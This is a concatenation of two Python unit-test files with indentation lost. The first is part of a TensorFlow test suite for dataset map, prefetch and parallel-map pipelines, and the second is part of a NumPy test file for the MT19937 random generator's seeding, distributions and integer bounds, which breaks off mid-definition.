self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def _testDisposeParallelMapDataset(self, explicit_dispose):
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
if explicit_dispose:
dispose_op = iterator.dispose_op()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
if explicit_dispose:
sess.run(dispose_op)
def testExplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(True)
def testImplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(False)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames)
.map(io_ops.read_file, num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
|
test_generator_mt19937.py
|
import sys
import hashlib
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
JUMP_TEST_DATA = [
{
"seed": 0,
"steps": 10,
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "8cb7b061136efceef5217a9ce2cc9a5a", "pos": 598},
},
{
"seed":384908324,
"steps":312,
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "2ecdbfc47a895b253e6e19ccb2e74b90", "pos": 276},
},
{
"seed": [839438204, 980239840, 859048019, 821],
"steps": 511,
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "433b85229f2ed853cde06cd872818305", "pos": 475},
},
]
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed:
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_multidimensional_pvals(self):
assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
def setup(self):
self.seed = 8675309
def test_argument_validation(self):
# Error cases...
# `colors` must be a 1-d sequence
assert_raises(ValueError, random.multivariate_hypergeometric,
10, 4)
# Negative nsample
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], -1)
# Negative color
assert_raises(ValueError, random.multivariate_hypergeometric,
[-1, 2, 3], 2)
# nsample exceeds sum(colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], 10)
# nsample exceeds sum(colors) (edge case of empty colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[], 1)
# Validation errors associated with very large values in colors.
assert_raises(ValueError, random.multivariate_hypergeometric,
[999999999, 101], 5, 1, 'marginals')
int64_info = np.iinfo(np.int64)
max_int64 = int64_info.max
max_int64_index = max_int64 // int64_info.dtype.itemsize
assert_raises(ValueError, random.multivariate_hypergeometric,
[max_int64_index - 100, 101], 5, 1, 'count')
@pytest.mark.parametrize('method', ['count', 'marginals'])
def test_edge_cases(self, method):
# Set the seed, but in fact, all the results in this test are
# deterministic, so we don't really need this.
random = Generator(MT19937(self.seed))
x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([], 0, method=method)
assert_array_equal(x, [])
x = random.multivariate_hypergeometric([], 0, size=1, method=method)
assert_array_equal(x, np.empty((1, 0), dtype=np.int64))
x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
assert_array_equal(x, [3, 0, 0])
colors = [1, 1, 0, 1, 1]
x = random.multivariate_hypergeometric(colors, sum(colors),
method=method)
assert_array_equal(x, colors)
x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
method=method)
assert_array_equal(x, [[3, 4, 5]]*3)
# Cases for nsample:
# nsample < 10
# 10 <= nsample < colors.sum()/2
# colors.sum()/2 < nsample < colors.sum() - 10
# colors.sum() - 10 < nsample < colors.sum()
@pytest.mark.parametrize('nsample', [8, 25, 45, 55])
@pytest.mark.parametrize('method', ['count', 'marginals'])
@pytest.mark.parametrize('size', [5, (2, 3), 150000])
def test_typical_cases(self, nsample, method, size):
random = Generator(MT19937(self.seed))
colors = np.array([10, 5, 20, 25])
sample = random.multivariate_hypergeometric(colors, nsample, size,
method=method)
if isinstance(size, int):
expected_shape = (size,) + colors.shape
else:
expected_shape = size + colors.shape
assert_equal(sample.shape, expected_shape)
assert_((sample >= 0).all())
assert_((sample <= colors).all())
assert_array_equal(sample.sum(axis=-1),
np.full(size, fill_value=nsample, dtype=int))
if isinstance(size, int) and size >= 100000:
# This sample is large enough to compare its mean to
# the expected values.
assert_allclose(sample.mean(axis=0),
nsample * colors / colors.sum(),
rtol=1e-3, atol=0.005)
def test_repeatability1(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
method='count')
expected = np.array([[2, 1, 2],
[2, 1, 2],
[1, 1, 3],
[2, 0, 3],
[2, 1, 2]])
assert_array_equal(sample, expected)
def test_repeatability2(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 50,
size=5,
method='marginals')
expected = np.array([[ 9, 17, 24],
[ 7, 13, 30],
[ 9, 15, 26],
[ 9, 17, 24],
[12, 14, 24]])
assert_array_equal(sample, expected)
def test_repeatability3(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 12,
size=5,
method='marginals')
expected = np.array([[2, 3, 7],
[5, 3, 4],
[2, 5, 5],
[5, 3, 4],
[1, 5, 6]])
assert_array_equal(sample, expected)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
# We use an md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little-endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'ba71ccaffeeeb9eeb1860f8075020b9c',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'ba71ccaffeeeb9eeb1860f8075020b9c'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
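# Editorial note: the bounds in the cases below straddle 2**32; these pinned
# regression values presumably exercise the point where integer generation
# switches between 32-bit and 64-bit sampling paths.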
@pytest.mark.parametrize(
'bound, expected',
[(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
3769704066, 1170797179, 4108474671])),
(2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
3769704067, 1170797180, 4108474672])),
